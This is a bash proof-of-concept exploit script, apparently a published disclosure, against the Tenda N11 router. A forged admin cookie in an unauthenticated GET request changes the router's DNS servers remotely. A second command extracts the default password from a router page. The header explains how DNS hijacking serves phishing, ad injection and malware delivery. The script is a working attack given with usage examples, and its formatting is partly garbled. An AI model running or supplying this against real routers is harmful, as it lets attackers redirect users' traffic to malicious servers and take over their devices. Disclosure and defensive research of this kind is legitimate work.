#!/bin/bash##Tenda N11 Wireless Router V5.07.43_en_NEX01#Cookie Session Weakness Remote DNS Change PoC Exploit##Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>#https://ethical-hacker.org/#https://facebook.com/ethicalhackerorg##Once modified, systems use foreign DNS servers,which are #usually set up by cybercriminals. Users with vulnerable #systems or devices who try to access certain sites are #instead redirected to possibly malicious sites.##Modifying systems' DNS settings allows cybercriminals to #perform malicious activities like:##oSteering unknowing users to bad sites: # These sites can be phishing pages that # spoof well-known sites in order to # trick users into handing out sensitive # information.##oReplacing ads on legitimate sites: # Visiting certain sites can serve users # with infected systems a different set # of ads from those whose systems are # not infected.# #oControlling and redirecting network traffic: # Users of infected systems may not be granted # access to download important OS and software # updates from vendors like Microsoft and from # their respective security vendors.##oPushing additional malware: # Infected systems are more prone to other # malware infections (e.g., FAKEAV infection).##Disclaimer:#This or previous programs is for Educational #purpose ONLY. Do not use it without permission. #The usual disclaimer applies, especially the #fact that Todor Donev is not liable for any #damages caused by direct or indirect use of the #information or functionality provided by these #programs. The author or any Internet provider #bears NO responsibility for content or misuse #of these programs or any derivatives thereof.#By using these programs you accept the fact #that any damage (dataloss, system crash, #system compromise, etc.) caused by the use #of these programs is not Todor Donev's #responsibility.# #Use them at your own risk!##if[[ $# -gt 3 || $# -lt 2 ]]; then
echo "Tenda N11 Wireless Router V5.07.43_en_NEX01 "
echo "Cookie Session Weakness Remote DNS Change PoC Exploit"
echo "==========================================================="
echo "Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo "Example: $0 133.7.133.7 8.8.8.8"
echo "Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo "Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>"
echo "https://ethical-hacker.org/ https://fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if[ $? -ne 0]; then
echo "Error : libwww-perl not found =/"
exit;
fi
GET -H "Cookie: admin:language=en; path=/""http://$1/goform/AdvSetDns?GO=wan_dns.asp&rebootTag=&DSEN=1&DNSEN=on&DS1=$2&DS2=$3"2>/dev/null
# Proof Of Concept 2:# [todor@paladium ~]$ GET "http://133.7.13.37:8080/advance.asp" | grep def_password= | sed 's/def_password=/ Password: /g'#Password: "Ethical-Hacker-Bulgaria-2o18";# [todor@paladium ~]$
